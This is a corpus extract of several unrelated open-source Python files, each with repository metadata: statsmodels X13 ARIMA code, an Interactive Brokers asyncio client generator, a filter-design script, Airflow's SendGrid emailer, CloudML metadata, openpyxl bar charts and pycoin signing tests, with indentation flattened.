# NOTE: there is not likely anything in stdout that's not in results
# so may be safe to just suppress and remove it
if not retspec:
res = X13ArimaAnalysisResult(observed=endog, results=results,
seasadj=seasadj, trend=trend,
irregular=irregular, stdout=stdout)
else:
res = X13ArimaAnalysisResult(observed=endog, results=results,
seasadj=seasadj, trend=trend,
irregular=irregular, stdout=stdout,
spec=spec)
return res
def x13_arima_select_order(endog, maxorder=(2, 1), maxdiff=(2, 1), diff=None,
exog=None, log=None, outlier=True, trading=False,
forecast_years=None,
start=None, freq=None, print_stdout=False,
x12path=None, prefer_x13=True):
"""
Perform automatic seasonal ARIMA order identification using x12/x13 ARIMA.
Parameters
----------
endog : array_like, pandas.Series
The series to model. It is best to use a pandas object with a
DatetimeIndex or PeriodIndex. However, you can pass an array-like
object. If your object does not have a dates index then ``start`` and
``freq`` are not optional.
maxorder : tuple
The maximum order of the regular and seasonal ARMA polynomials to
examine during the model identification. The order for the regular
polynomial must be greater than zero and no larger than 4. The
order for the seasonal polynomial may be 1 or 2.
maxdiff : tuple
The maximum orders for regular and seasonal differencing in the
automatic differencing procedure. Acceptable inputs for regular
differencing are 1 and 2. The maximum order for seasonal differencing
is 1. If ``diff`` is specified then ``maxdiff`` should be None.
Otherwise, ``diff`` will be ignored. See also ``diff``.
diff : tuple
Fixes the orders of differencing for the regular and seasonal
differencing. Regular differencing may be 0, 1, or 2. Seasonal
differencing may be 0 or 1. ``maxdiff`` must be None, otherwise
``diff`` is ignored.
exog : array_like
Exogenous variables.
log : bool or None
If None, it is automatically determined whether to log the series or
not. If False, logs are not taken. If True, logs are taken.
outlier : bool
Whether or not outliers are tested for and corrected, if detected.
trading : bool
Whether or not trading day effects are tested for.
forecast_years : int
Number of forecasts produced. The default is one year.
start : str, datetime
Must be given if ``endog`` does not have date information in its index.
Anything accepted by pandas.DatetimeIndex for the start value.
freq : str
Must be givein if ``endog`` does not have date information in its
index. Anything accepted by pandas.DatetimeIndex for the freq value.
print_stdout : bool
The stdout from X12/X13 is suppressed. To print it out, set this
to True. Default is False.
x12path : str or None
The path to x12 or x13 binary. If None, the program will attempt
to find x13as or x12a on the PATH or by looking at X13PATH or X12PATH
depending on the value of prefer_x13.
prefer_x13 : bool
If True, will look for x13as first and will fallback to the X13PATH
environmental variable. If False, will look for x12a first and will
fallback to the X12PATH environmental variable. If x12path points
to the path for the X12/X13 binary, it does nothing.
Returns
-------
results : Bunch
A bunch object that has the following attributes:
- order : tuple
The regular order
- sorder : tuple
The seasonal order
- include_mean : bool
Whether to include a mean or not
- results : str
The full results from the X12/X13 analysis
- stdout : str
The captured stdout from the X12/X13 analysis
Notes
-----
This works by creating a specification file, writing it to a temporary
directory, invoking X12/X13 in a subprocess, and reading the output back
in.
"""
results = x13_arima_analysis(endog, x12path=x12path, exog=exog, log=log,
outlier=outlier, trading=trading,
forecast_years=forecast_years,
maxorder=maxorder, maxdiff=maxdiff, diff=diff,
start=start, freq=freq, prefer_x13=prefer_x13)
model = re.search("(?<=Final automatic model choice : ).*",
results.results)
order = model.group()
if re.search("Mean is not significant", results.results):
include_mean = False
elif re.search("Constant", results.results):
include_mean = True
else:
include_mean = False
order, sorder = _clean_order(order)
res = Bunch(order=order, sorder=sorder, include_mean=include_mean,
results=results.results, stdout=results.stdout)
return res
class X13ArimaAnalysisResult(object):
def __init__(self, **kwargs):
for key, value in iteritems(kwargs):
setattr(self, key, value)
def plot(self):
from statsmodels.graphics.utils import _import_mpl
plt = _import_mpl()
fig, axes = plt.subplots(4, 1, sharex=True)
self.observed.plot(ax=axes[0], legend=False)
axes[0].set_ylabel('Observed')
self.seasadj.plot(ax=axes[1], legend=False)
axes[1].set_ylabel('Seas. Adjusted')
self.trend.plot(ax=axes[2], legend=False)
axes[2].set_ylabel('Trend')
self.irregular.plot(ax=axes[3], legend=False)
axes[3].set_ylabel('Irregular')
fig.tight_layout()
return fig
| 36.837971 | 79 | 0.608095 | [
"BSD-3-Clause"
] | diego-mazon/statsmodels | statsmodels/tsa/x13.py | 22,508 | Python |
from ib_tws_server.codegen.generator_utils import GeneratorUtils
from ib_tws_server.api_definition import *
from ib_tws_server.codegen.generator_utils import *
import inspect
def forward_method_parameters_dict_style(params: List[inspect.Parameter]) -> str:
return ",".join([ f"{v.name} = {v.name}" for v in params ])
def request_state_member_name(d: ApiDefinition):
return f"_req_state"
def subscription_member_name(d: ApiDefinition):
return f"_subscriptions"
def response_instance(d: ApiDefinition, m: Callable):
callback_type,is_wrapper = GeneratorUtils.callback_type(d, m)
if is_wrapper:
return f"{callback_type}({forward_method_parameters_dict_style(GeneratorUtils.data_class_members(d, [m], False))})"
else:
return GeneratorUtils.data_class_members(d, [m], False)[0].name
def streaming_instance(d: ApiDefinition, m: Callable):
callback_type,is_wrapper = GeneratorUtils.callback_type(d, m)
if is_wrapper:
return f"{callback_type}({forward_method_parameters_dict_style(GeneratorUtils.data_class_members(d, [m], True))})"
else:
return GeneratorUtils.data_class_members(d, [m], False)[0].name
def request_id(d: ApiDefinition, m: Callable):
if not d.uses_req_id:
return f"'{d.request_method.__name__}'"
else:
return GeneratorUtils.req_id_param_name(m)
def current_request_state(d: ApiDefinition, m: Callable):
return f"self.{request_state_member_name(d)}[{request_id(d, m)}]"
def bind_method(d: ApiDefinition, m: Callable, param_values: List[str]) -> str:
param_values[0] = f"self._client.{m.__name__}"
return f"functools.partial({','.join(param_values)})"
class AsyncioClientGenerator:
@staticmethod
def generate(filename):
def init_callback(d: ApiDefinition, m: Callable, cb: str):
if d.callback_methods is not None or d.done_method is not None:
return f"{current_request_state(d,m)}.{cb} = {cb}"
return ""
def init_request_id(d: ApiDefinition, u: Callable):
if d.uses_req_id:
return f"{GeneratorUtils.req_id_param_name(d.request_method)} = self.next_request_id()"
else:
return ""
def init_subscription(d: ApiDefinition):
if d.cancel_method is None:
raise RuntimeError(f"Request does not support cancellation {d.request_method.__name__}")
current_subscription = f"self.{subscription_member_name(d)}[{request_id(d, d.request_method)}]"
return f"{current_subscription}= SubscriptionGenerator(self.__{d.cancel_method.__name__}, {GeneratorUtils.req_id_param_name(d.request_method)})"
def async_request_method(d: ApiDefinition, is_subscription: bool):
method_name = GeneratorUtils.request_method_name(d, is_subscription)
original_sig = GeneratorUtils.signature(d.request_method)
signature = GeneratorUtils.request_signature(d, is_subscription)
param_values = [ p.name if p.name != d.subscription_flag_name else f"{d.subscription_flag_value if is_subscription else not d.subscription_flag_value}" for p in original_sig.parameters.values() ]
if is_subscription:
return f"""
async def {method_name}{signature}:
{GeneratorUtils.doc_string(d.request_method)}
{init_request_id(d, d.request_method)}
ret: SubscriptionGenerator = None
with self._lock:
ret = {init_subscription(d)}
self._writer.queue.put({bind_method(d, d.request_method, param_values)})
return ret"""
if d.callback_methods is not None or d.done_method is not None:
return f"""
async def {method_name}{signature}:
{GeneratorUtils.doc_string(d.request_method)}
loop = asyncio.get_running_loop()
future = loop.create_future()
def cb(res: {GeneratorUtils.request_return_type(d, is_subscription)}):
loop.call_soon_threadsafe(future.set_result, res)
{init_request_id(d, d.request_method)}
with self._lock:
{init_callback(d, d.request_method, 'cb')}
self._writer.queue.put({bind_method(d, d.request_method, param_values)})
res = (await future)
if isinstance(res, IbError):
raise res
return res"""
else:
return f"""
async def {method_name}{signature}:
{GeneratorUtils.doc_string(d.request_method)}
{init_request_id(d, d.request_method)}
self._writer.queue.put({bind_method(d, d.request_method, param_values)})
return None"""
def cancel_method(d: ApiDefinition):
return f"""
def __{GeneratorUtils.method_declaration(d.cancel_method)}:
{GeneratorUtils.doc_string(d.cancel_method)}
self.cancel_request({request_id(d,d.cancel_method)})
self._writer.queue.put({bind_method(d, d.cancel_method, list(GeneratorUtils.signature(d.cancel_method).parameters))})"""
with open(filename, "w") as f:
f.write(f"""
import asyncio
import functools
from collections import defaultdict
from ibapi.client import EClient
from ib_tws_server.asyncio.ib_writer import IBWriter
from ib_tws_server.asyncio.request_state import *
from ib_tws_server.asyncio.subscription_generator import SubscriptionGenerator
from ib_tws_server.error import *
from ib_tws_server.gen.client_responses import *
from ib_tws_server.gen.asyncio_wrapper import *
from ib_tws_server.ib_imports import *
from threading import Lock, Thread
import time
from typing import Callable, Dict, List, Tuple
class AsyncioClient():
_lock: Lock
_req_state: Dict[str, RequestState]
_subscriptions: Dict[int, SubscriptionGenerator]
_wrapper: AsyncioWrapper
_client: EClient
def __init__(self):
self._lock = Lock()
self._current_request_id = 0
self._req_state = defaultdict(RequestState)
self._subscriptions = defaultdict(SubscriptionGenerator)
self._wrapper = AsyncioWrapper(self._lock, self._req_state, self._subscriptions)
self._client = EClient(self._wrapper)
self._writer = IBWriter(self._client)
self._wrapper._writer = self._writer
def run(self):
self._writer.start()
self._client.run()
def next_request_id(self):
with self._lock:
self._current_request_id += 1
return self._current_request_id
def disconnect(self, clean=False):
self._wrapper._expecting_disconnect = clean
return self._client.disconnect()
def cancel_request(self, id: RequestId):
response_cb = None
with self._lock:
if id in self._req_state:
response_cb = self._req_state[id].cb
del self._req_state[id]
if id in self._subscriptions:
del self._subscriptions[id]
if response_cb is not None:
response_cb(None)
def start(self, host: str, port: int, client_id: int, connection_retry_interval: int):
while True:
try:
self._client.connect(host, port, client_id)
break
except ConnectionError as e:
if connection_retry_interval > 0:
time.sleep(connection_retry_interval)
else:
raise e
thread = Thread(target = self.run)
thread.start()
setattr(thread, "_thread", thread)
def active_request_count(self):
with self._lock:
return len(self._req_state)
def active_subscription_count(self):
with self._lock:
return len(self._subscriptions)
"""
)
for d in REQUEST_DEFINITIONS:
if d.request_method is not None:
if d.subscription_flag_name is not None:
f.write(async_request_method(d, False))
f.write(async_request_method(d, True))
else:
f.write(async_request_method(d, d.is_subscription))
if d.cancel_method is not None and (d.is_subscription or d.subscription_flag_name is not None):
f.write(cancel_method(d))
class AsyncioWrapperGenerator:
@staticmethod
def generate(filename):
def update_response(d: ApiDefinition, m:Callable):
if GeneratorUtils.response_is_list(d):
return f"""
if {request_id(d, m)} in self._req_state:
req_state = {current_request_state(d, m)}
if req_state.response is None:
req_state.response = []
req_state.response.append({response_instance(d, m)})"""
else:
return f"""
if {request_id(d, m)} in self._req_state:
req_state = {current_request_state(d, m)}
if req_state is not None:
req_state.response = {response_instance(d, m)}"""
def call_response_cb(d: ApiDefinition, m: Callable):
if d.callback_methods is not None:
return f"self.call_response_cb({request_id(d,m)})"
else:
return ""
def call_response_cb_if_done(d: ApiDefinition, m: Callable):
if d.has_done_flag:
return f"""
if (done):
{call_response_cb(d, m)}"""
elif not GeneratorUtils.response_is_list(d):
return f"""
{call_response_cb(d,m)}"""
else:
return ""
def callback_method(d: ApiDefinition, m: Callable):
if d.subscription_flag_name is not None:
return f"""
def {GeneratorUtils.method_declaration(m)}:
{GeneratorUtils.doc_string(m)}
is_subscription: bool = False
with self._lock:
is_subscription = {request_id(d, m)} in self._subscriptions
{update_response(d, m)}
if is_subscription:
self.call_streaming_cb({request_id(d,m)}, {streaming_instance(d,m)})
return
{call_response_cb_if_done(d, m)}"""
elif not d.is_subscription:
return f"""
def {GeneratorUtils.method_declaration(m)}:
{GeneratorUtils.doc_string(m)}
with self._lock:
{update_response(d, m)}
{call_response_cb_if_done(d, m)}"""
else:
return f"""
def {GeneratorUtils.method_declaration(m)}:
{GeneratorUtils.doc_string(m)}
self.call_streaming_cb({request_id(d,m)}, {streaming_instance(d,m)})"""
def done_method(d: ApiDefinition):
return f"""
def {GeneratorUtils.method_declaration(d.done_method)}:
{GeneratorUtils.doc_string(d.done_method)}
{call_response_cb(d,d.done_method)}"""
with open(filename, "w") as f:
f.write(f"""
from ibapi.wrapper import EWrapper
from ib_tws_server.asyncio.ib_writer import IBWriter
from ib_tws_server.asyncio.request_state import *
from ib_tws_server.asyncio.subscription_generator import SubscriptionGenerator
from ib_tws_server.error import *
from ib_tws_server.gen.client_responses import *
from ib_tws_server.ib_imports import *
from threading import Lock
from typing import Dict, List
class AsyncioWrapper(EWrapper):
_lock: Lock
_req_state: Dict[str, RequestState]
_subscriptions: Dict[int, SubscriptionGenerator]
_expecting_disconnect: bool
_writer: IBWriter
def __init__(self, lock: Lock, req_state: Dict[str, RequestState], subscriptions: Dict[int, SubscriptionGenerator]):
self._lock = lock
self._req_state = req_state
self._subscriptions = subscriptions
EWrapper.__init__(self)
self._expecting_disconnect = False
def connectionClosed(self):
if self._expecting_disconnect:
# Wake up writer
self._writer.queue.put(lambda *a, **k: None)
else:
raise ConnectionError("Unexpected disconnect")
def call_response_cb(self, id: RequestId, res=None):
cb = None
with self._lock:
if not id in self._req_state:
return
s = self._req_state[id]
cb = s.cb
if res is None:
res = s.response
del self._req_state[id]
if cb is not None:
cb(res)
def error(self, reqId: int, errorCode: int, errorString: str):
cb = None
if reqId is not None:
with self._lock:
if reqId in self._req_state:
s = self._req_state[reqId]
cb = s.cb
del self._req_state[reqId]
if cb is not None:
cb(IbError(errorString, errorCode))
else:
super().error(reqId, errorCode, errorString)
def call_streaming_cb(self, id: RequestId, res: any):
cb = None
loop = None
with self._lock:
if id in self._subscriptions:
s = self._subscriptions[id]
cb = s.add_to_queue
loop = s._loop
if loop is not None:
loop.call_soon_threadsafe(cb, res)
""")
for d in REQUEST_DEFINITIONS:
if d.request_method is not None:
if d.callback_methods is not None:
for m in d.callback_methods:
f.write(callback_method(d, m))
if d.done_method is not None:
f.write(done_method(d))
| 38.153631 | 207 | 0.628157 | [
"MIT"
] | ncpenke/ib_tws_server_py | ib_tws_server/codegen/asyncio_client_generator.py | 13,659 | Python |
import numpy as np
import scipy.signal as signal
import matplotlib.pyplot as plt
FS = 48000.0
FREQ = 9000
omega = 2 * np.pi * FREQ
r = np.array([251589, -130428 - 4165j, -130428 + 4165j, 4634 - 22873j, 4634 + 22873j])
p = np.array([-46580, -55482 + 25082j, -55482 - 25082j, -26292 - 59437j, -26292 + 59437j])
r = np.array([5092.0, -11256.0 - 99566.0j, -11256.0 + 99566.0, -13802.0 - 24606.0j, -13802.0 + 24606.0j])
p = np.array([-176261.0, -51468.0 - 21437.0j, -51468.0 + 21437.0j, -26276.0 - 59699.0j, -26276.0 + 59699.0j])
H0 = 0
for i in range(5):
prod = r[i]
for k in range(5):
if i == k:
continue
prod *= p[k]
H0 += prod
print(H0)
# print(z)
# print(p)
worN=np.logspace(1, 5, 1000)
w, h = signal.freqs_zpk([], p, H0, worN)
plt.figure()
plt.semilogx(w, 20 * np.log10(abs(h)))
fc = 500.0
# freq_factor = fc / 9400
freq_factor = fc / 11000
r = r * freq_factor
p = p * freq_factor
H0 = 0
for i in range(5):
prod = r[i]
for k in range(5):
if i == k:
continue
prod *= p[k]
H0 += prod
w, h = signal.freqs_zpk([], p, H0, worN)
plt.semilogx(w, 20 * np.log10(abs(h)))
z, p, k = signal.butter(5, 2 * np.pi * fc, analog=True, output='zpk')
w, h = signal.freqs_zpk(z, p, k, worN)
plt.semilogx(w, 20 * np.log10(abs(h)))
plt.xlabel('Frequency')
plt.ylabel('Amplitude response [dB]')
plt.ylim(-90)
plt.grid()
# plt.figure()
# plt.plot(z.real, z.imag, 'go')
# plt.plot(p.real, p.imag, 'rx')
# plt.grid()
plt.show()
| 22.666667 | 109 | 0.589572 | [
"BSD-3-Clause"
] | jatinchowdhury18/BBDDelay | sim/filter_design.py | 1,496 | Python |
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""
Airflow module for emailer using sendgrid
"""
import base64
import logging
import mimetypes
import os
from typing import Dict, Iterable, Optional, Union
import sendgrid
from sendgrid.helpers.mail import (
Attachment,
Category,
Content,
CustomArg,
Email,
Mail,
MailSettings,
Personalization,
SandBoxMode,
)
from airflow.utils.email import get_email_address_list
log = logging.getLogger(__name__)
AddressesType = Union[str, Iterable[str]]
def send_email(
to: AddressesType,
subject: str,
html_content: str,
files: Optional[AddressesType] = None,
cc: Optional[AddressesType] = None,
bcc: Optional[AddressesType] = None,
sandbox_mode: bool = False,
**kwargs,
) -> None:
"""
Send an email with html content using `Sendgrid <https://sendgrid.com/>`__.
.. note::
For more information, see :ref:`email-configuration-sendgrid`
"""
if files is None:
files = []
mail = Mail()
from_email = kwargs.get('from_email') or os.environ.get('SENDGRID_MAIL_FROM')
from_name = kwargs.get('from_name') or os.environ.get('SENDGRID_MAIL_SENDER')
mail.from_email = Email(from_email, from_name)
mail.subject = subject
mail.mail_settings = MailSettings()
if sandbox_mode:
mail.mail_settings.sandbox_mode = SandBoxMode(enable=True)
# Add the recipient list of to emails.
personalization = Personalization()
to = get_email_address_list(to)
for to_address in to:
personalization.add_to(Email(to_address))
if cc:
cc = get_email_address_list(cc)
for cc_address in cc:
personalization.add_cc(Email(cc_address))
if bcc:
bcc = get_email_address_list(bcc)
for bcc_address in bcc:
personalization.add_bcc(Email(bcc_address))
# Add custom_args to personalization if present
pers_custom_args = kwargs.get('personalization_custom_args', None)
if isinstance(pers_custom_args, dict):
for key in pers_custom_args.keys():
personalization.add_custom_arg(CustomArg(key, pers_custom_args[key]))
mail.add_personalization(personalization)
mail.add_content(Content('text/html', html_content))
categories = kwargs.get('categories', [])
for cat in categories:
mail.add_category(Category(cat))
# Add email attachment.
for fname in files:
basename = os.path.basename(fname)
with open(fname, "rb") as file:
content = base64.b64encode(file.read()).decode('utf-8')
attachment = Attachment(
file_content=content,
file_type=mimetypes.guess_type(basename)[0],
file_name=basename,
disposition="attachment",
content_id=f"<{basename}>",
)
mail.add_attachment(attachment)
_post_sendgrid_mail(mail.get())
def _post_sendgrid_mail(mail_data: Dict) -> None:
sendgrid_client = sendgrid.SendGridAPIClient(api_key=os.environ.get('SENDGRID_API_KEY'))
response = sendgrid_client.client.mail.send.post(request_body=mail_data)
# 2xx status code.
if 200 <= response.status_code < 300:
log.info(
'Email with subject %s is successfully sent to recipients: %s',
mail_data['subject'],
mail_data['personalizations'],
)
else:
log.error(
'Failed to send out email with subject %s, status code: %s',
mail_data['subject'],
response.status_code,
)
| 30.964029 | 92 | 0.681227 | [
"Apache-2.0"
] | AI-ML-Projects/airflow | airflow/providers/sendgrid/utils/emailer.py | 4,304 | Python |
#!/usr/bin/env python
# Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ************************************************************************
# YOU NEED TO MODIFY THE META DATA TO ADAPT THE TRAINER TEMPLATE YOUR DATA
# ************************************************************************
# task type can be either 'classification' or 'regression', based on the target feature in the dataset
TASK_TYPE = 'regression'
# list of all the columns (header) of the input data file(s)
HEADER = ['CRIM', 'ZN', 'INDUS', 'CHAS', 'NOX', 'RM', 'AGE', 'DIS', 'RAD', 'TAX', 'PTRATIO', 'B', 'LSTAT', 'MEDV']
# list of the default values of all the columns of the input data, to help decoding the data types of the columns
HEADER_DEFAULTS = [[0.0], [0.0], [0.0], [0], [0.0], [0.0], [0.0], [0.0], [0.0], [0.0], [0.0], [0.0], [0.0], [0.0]]
# list of the feature names of type int or float
INPUT_NUMERIC_FEATURE_NAMES = ['CRIM', 'ZN', 'INDUS', 'NOX', 'RM', 'AGE', 'DIS', 'RAD', 'TAX', 'PTRATIO', 'B', 'LSTAT']
# numeric features constructed, if any, in process_features function in input.py module,
# as part of reading data
CONSTRUCTED_NUMERIC_FEATURE_NAMES = []
# a dictionary of feature names with int values, but to be treated as categorical features.
# In the dictionary, the key is the feature name, and the value is the num_buckets (count of distinct values)
INPUT_CATEGORICAL_FEATURE_NAMES_WITH_IDENTITY = {'CHAS': 2}
# categorical features with identity constructed, if any, in process_features function in input.py module,
# as part of reading data. Usually include constructed boolean flags
CONSTRUCTED_CATEGORICAL_FEATURE_NAMES_WITH_IDENTITY = {}
# a dictionary of categorical features with few nominal values (to be encoded as one-hot indicators)
# In the dictionary, the key is the feature name, and the value is the list of feature vocabulary
INPUT_CATEGORICAL_FEATURE_NAMES_WITH_VOCABULARY = {}
# a dictionary of categorical features with many values (sparse features)
# In the dictionary, the key is the feature name, and the value is the bucket size
INPUT_CATEGORICAL_FEATURE_NAMES_WITH_HASH_BUCKET = {}
# list of all the categorical feature names
INPUT_CATEGORICAL_FEATURE_NAMES = list(INPUT_CATEGORICAL_FEATURE_NAMES_WITH_IDENTITY.keys()) \
+ list(INPUT_CATEGORICAL_FEATURE_NAMES_WITH_VOCABULARY.keys()) \
+ list(INPUT_CATEGORICAL_FEATURE_NAMES_WITH_HASH_BUCKET.keys()) \
\
# list of all the input feature names to be used in the model
INPUT_FEATURE_NAMES = INPUT_NUMERIC_FEATURE_NAMES + INPUT_CATEGORICAL_FEATURE_NAMES
# the column include the weight of each record
WEIGHT_COLUMN_NAME = None
# target feature name (response or class variable)
TARGET_NAME = 'MEDV'
# list of the columns expected during serving (which probably different than the header of the training data)
SERVING_COLUMNS = ['CRIM', 'ZN', 'INDUS', 'CHAS', 'NOX', 'RM', 'AGE', 'DIS', 'RAD', 'TAX', 'PTRATIO', 'B', 'LSTAT']
# list of the default values of all the columns of the serving data, to help decoding the data types of the columns
SERVING_DEFAULTS = [[0.0], [0.0], [0.0], [0], [0.0], [0.0], [0.0], [0.0], [0.0], [0.0], [0.0], [0.0], [0.0]]
| 52.194444 | 119 | 0.695583 | [
"Apache-2.0"
] | 0olwzo0/cloudml-samples | cloudml-template/examples/housing-regression/trainer/metadata.py | 3,758 | Python |
# Copyright (c) 2010-2020 openpyxl
from openpyxl.descriptors.serialisable import Serialisable
from openpyxl.descriptors import (
Typed,
Bool,
Integer,
Sequence,
Alias,
)
from openpyxl.descriptors.excel import ExtensionList
from openpyxl.descriptors.nested import (
NestedNoneSet,
NestedSet,
NestedBool,
NestedInteger,
NestedMinMax,
)
from .descriptors import (
NestedGapAmount,
NestedOverlap,
)
from ._chart import ChartBase
from ._3d import _3DBase
from .axis import TextAxis, NumericAxis, SeriesAxis, ChartLines
from .shapes import GraphicalProperties
from .series import Series
from .legend import Legend
from .label import DataLabelList
class _BarChartBase(ChartBase):
barDir = NestedSet(values=(['bar', 'col']))
type = Alias("barDir")
grouping = NestedSet(values=(['percentStacked', 'clustered', 'standard',
'stacked']))
varyColors = NestedBool(nested=True, allow_none=True)
ser = Sequence(expected_type=Series, allow_none=True)
dLbls = Typed(expected_type=DataLabelList, allow_none=True)
dataLabels = Alias("dLbls")
__elements__ = ('barDir', 'grouping', 'varyColors', 'ser', 'dLbls')
_series_type = "bar"
def __init__(self,
barDir="col",
grouping="clustered",
varyColors=None,
ser=(),
dLbls=None,
**kw
):
self.barDir = barDir
self.grouping = grouping
self.varyColors = varyColors
self.ser = ser
self.dLbls = dLbls
super(_BarChartBase, self).__init__(**kw)
class BarChart(_BarChartBase):
tagname = "barChart"
barDir = _BarChartBase.barDir
grouping = _BarChartBase.grouping
varyColors = _BarChartBase.varyColors
ser = _BarChartBase.ser
dLbls = _BarChartBase.dLbls
gapWidth = NestedGapAmount()
overlap = NestedOverlap()
serLines = Typed(expected_type=ChartLines, allow_none=True)
extLst = Typed(expected_type=ExtensionList, allow_none=True)
# chart properties actually used by containing classes
x_axis = Typed(expected_type=TextAxis)
y_axis = Typed(expected_type=NumericAxis)
__elements__ = _BarChartBase.__elements__ + ('gapWidth', 'overlap', 'serLines', 'axId')
def __init__(self,
gapWidth=150,
overlap=None,
serLines=None,
extLst=None,
**kw
):
self.gapWidth = gapWidth
self.overlap = overlap
self.serLines = serLines
self.x_axis = TextAxis()
self.y_axis = NumericAxis()
self.legend = Legend()
super(BarChart, self).__init__(**kw)
class BarChart3D(_BarChartBase, _3DBase):
tagname = "bar3DChart"
barDir = _BarChartBase.barDir
grouping = _BarChartBase.grouping
varyColors = _BarChartBase.varyColors
ser = _BarChartBase.ser
dLbls = _BarChartBase.dLbls
view3D = _3DBase.view3D
floor = _3DBase.floor
sideWall = _3DBase.sideWall
backWall = _3DBase.backWall
gapWidth = NestedGapAmount()
gapDepth = NestedGapAmount()
shape = NestedNoneSet(values=(['cone', 'coneToMax', 'box', 'cylinder', 'pyramid', 'pyramidToMax']))
serLines = Typed(expected_type=ChartLines, allow_none=True)
extLst = Typed(expected_type=ExtensionList, allow_none=True)
x_axis = Typed(expected_type=TextAxis)
y_axis = Typed(expected_type=NumericAxis)
z_axis = Typed(expected_type=SeriesAxis, allow_none=True)
__elements__ = _BarChartBase.__elements__ + ('gapWidth', 'gapDepth', 'shape', 'serLines', 'axId')
def __init__(self,
gapWidth=150,
gapDepth=150,
shape=None,
serLines=None,
extLst=None,
**kw
):
self.gapWidth = gapWidth
self.gapDepth = gapDepth
self.shape = shape
self.serLines = serLines
self.x_axis = TextAxis()
self.y_axis = NumericAxis()
self.z_axis = SeriesAxis()
super(BarChart3D, self).__init__(**kw)
| 28.793103 | 103 | 0.634251 | [
"Apache-2.0"
] | AdrianaViabL/Curso-Python-udemy | venv/lib/python3.8/site-packages/openpyxl/chart/bar_chart.py | 4,175 | Python |
import unittest
from pycoin.coins import tx_utils
from pycoin.cmds.tx import DEFAULT_VERSION
from pycoin.ecdsa.secp256k1 import secp256k1_generator
from pycoin.encoding.hexbytes import h2b
from pycoin.solve.utils import build_hash160_lookup, build_p2sh_lookup
from pycoin.symbols.btc import network
from pycoin.ui.key_from_text import key_from_text
# BRAIN DAMAGE
address_for_p2s = network.ui.address_for_p2s
script_for_address = network.ui.script_for_address
script_for_multisig = network.script_info.script_for_multisig
Spendable = network.tx.Spendable
Tx = network.tx
TxIn = network.tx.TxIn
TxOut = network.tx.TxOut
Key = network.extras.Key
class SignTest(unittest.TestCase):
def test_sign_p2sh(self):
tx_out_script = h2b("76a91491b24bf9f5288532960ac687abb035127b1d28a588ac")
script = script_for_address("1EHNa6Q4Jz2uvNExL497mE43ikXhwF6kZm")
self.assertEqual(tx_out_script, script)
tx_out = TxOut(100, tx_out_script)
tx = Tx(1, [TxIn(b'\1' * 32, 1)], [TxOut(100, tx_out_script)])
tx.set_unspents([tx_out])
hl = build_hash160_lookup([1], [secp256k1_generator])
self.assertEqual(tx.bad_solution_count(), 1)
tx.sign(hash160_lookup=hl)
self.assertEqual(tx.bad_solution_count(), 0)
def multisig_M_of_N(self, M, N, unsigned_id, signed_id):
keys = [Key(secret_exponent=i, generator=secp256k1_generator) for i in range(1, N+2)]
tx_in = TxIn.coinbase_tx_in(script=b'')
script = script_for_multisig(m=M, sec_keys=[key.sec() for key in keys[:N]])
tx_out = TxOut(1000000, script)
tx1 = Tx(version=1, txs_in=[tx_in], txs_out=[tx_out])
tx2 = tx_utils.create_tx(tx1.tx_outs_as_spendable(), [keys[-1].address()])
self.assertEqual(tx2.id(), unsigned_id)
self.assertEqual(tx2.bad_solution_count(), 1)
hash160_lookup = build_hash160_lookup((key.secret_exponent() for key in keys[:M]), [secp256k1_generator])
tx2.sign(hash160_lookup=hash160_lookup)
self.assertEqual(tx2.id(), signed_id)
self.assertEqual(tx2.bad_solution_count(), 0)
def test_sign_multisig_1_of_2(self):
unsigned_id = "dd40f601e801ad87701b04851a4a6852d6b625e481d0fc9c3302faf613a4fc88"
signed_id = "fb9ccc00d0e30ab2648768104fd777df8f856830233232c5e43f43584aec23d9"
self.multisig_M_of_N(1, 2, unsigned_id, signed_id)
def test_sign_multisig_2_of_3(self):
unsigned_id = "6bc5614a41c7c4aa828f5a4314fff23e5e49b1137e5d31e9716eb58f6fb198ff"
signed_id = "c521962fe9d0e5efb7d0966759c57e7ee2595ce8e05cb342b19265a8722420dd"
self.multisig_M_of_N(2, 3, unsigned_id, signed_id)
def test_multisig_one_at_a_time(self):
M = 3
N = 3
keys = [Key(secret_exponent=i, generator=secp256k1_generator) for i in range(1, N+2)]
tx_in = TxIn.coinbase_tx_in(script=b'')
script = script_for_multisig(m=M, sec_keys=[key.sec() for key in keys[:N]])
tx_out = TxOut(1000000, script)
tx1 = Tx(version=1, txs_in=[tx_in], txs_out=[tx_out])
tx2 = tx_utils.create_tx(tx1.tx_outs_as_spendable(), [keys[-1].address()])
ids = ["403e5bfc59e097bb197bf77a692d158dd3a4f7affb4a1fa41072dafe7bec7058",
"5931d9995e83721243dca24772d7012afcd4378996a8b953c458175f15a544db",
"9bb4421088190bbbb5b42a9eaa9baed7ec7574a407c25f71992ba56ca43d9c44",
"03a1dc2a63f93a5cf5a7cb668658eb3fc2eda88c06dc287b85ba3e6aff751771"]
for i in range(1, N+1):
self.assertEqual(tx2.bad_solution_count(), 1)
self.assertEqual(tx2.id(), ids[i-1])
hash160_lookup = build_hash160_lookup((key.secret_exponent() for key in keys[i-1:i]), [secp256k1_generator])
tx2.sign(hash160_lookup=hash160_lookup)
self.assertEqual(tx2.id(), ids[i])
self.assertEqual(tx2.bad_solution_count(), 0)
def test_p2sh_multisig_sequential_signing(self):
raw_scripts = [h2b(
"52210234abcffd2e80ad01c2ec0276ad02682808169c6fafdd25ebfb60703df272b461"
"2102e5baaafff8094e4d77ce8b009d5ebc3de9110085ebd3d96e50cc7ce70faf175221"
"0316ee25e80eb6e6fc734d9c86fa580cbb9c4bfd94a19f0373a22353ececd4db6853ae")]
